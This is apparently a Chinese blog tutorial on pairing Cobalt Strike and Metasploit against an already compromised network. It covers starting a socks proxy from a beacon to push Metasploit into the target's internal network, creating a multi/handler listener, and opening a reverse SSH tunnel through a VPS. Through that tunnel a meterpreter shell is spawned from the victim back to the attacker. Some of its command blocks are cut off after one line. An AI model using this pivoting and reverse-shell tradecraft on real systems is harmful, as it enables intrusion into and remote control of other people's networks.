CobaltStrike+MetaSploit 实战联动
Aug 19, 2019
通过beacon内置的socks功能将本地Msf直接代入目标内网进行操作
首先,到已控目标内网机器的beacon shell下把socks起起来
1 | beacon> getuid |
接着,点开cs菜单找到 “Proxy Pivots” 复制生成的msf代理链接
本地启动msf,挂着上面生成的代理链接,即可直接对目标内网进行各种探测
1 |
|
尝试借助CobaltStrike的外部tcp监听器通过ssh隧道直接派生一个meterpreter 的 shell 到本地
先在cs上创建一个tcp的外部监听器,回连端口设为8080
接着,到本地机器把msf起起来,并创建如下监听器
1 | msf > use exploit/multi/handler |
随后,回到自己的vps机器上编辑sshd配置,开启ssh转发功能,重启ssh服务。
1 | # vi/etc/ssh/sshd_config |
再次回到自己本地的linux中并通过ssh隧道做好如下转发,意思就是通过1.1.1.1 这台机器把来自外部的8080端口流量全部转到我本地192.168.3.137的8080端口上,而本地192.168.0.109的8080端口上跑的又正好是meter的监听器,所以,最终才会造成meterpreter本地上线的效果
1 | # ssh -C -f -N -g -R 0.0.0.0:8080:192.168.0.109:8080 root@1.1.1.1 -p 22 |
隧道建立之后,习惯性的到vps上去看一眼,刚才通过隧道监听的8080端口到底有没有起来,确实起起来了才说明隧道才是通的,另外,监听的端口不能和vps机器上的现有端口冲突,否则隧道是建不成功的
1 | # netstat -tulnp |grep '8080' |
最终,回到cs上选择目标内网指定机器的beacon shell 点击 “Spawn” 派生,再选择刚在上面创建好的tcp的外部监听器,相应目标机器的meterpreter就会被直接弹到本地,如下,当然,你也可以批量选择进行操作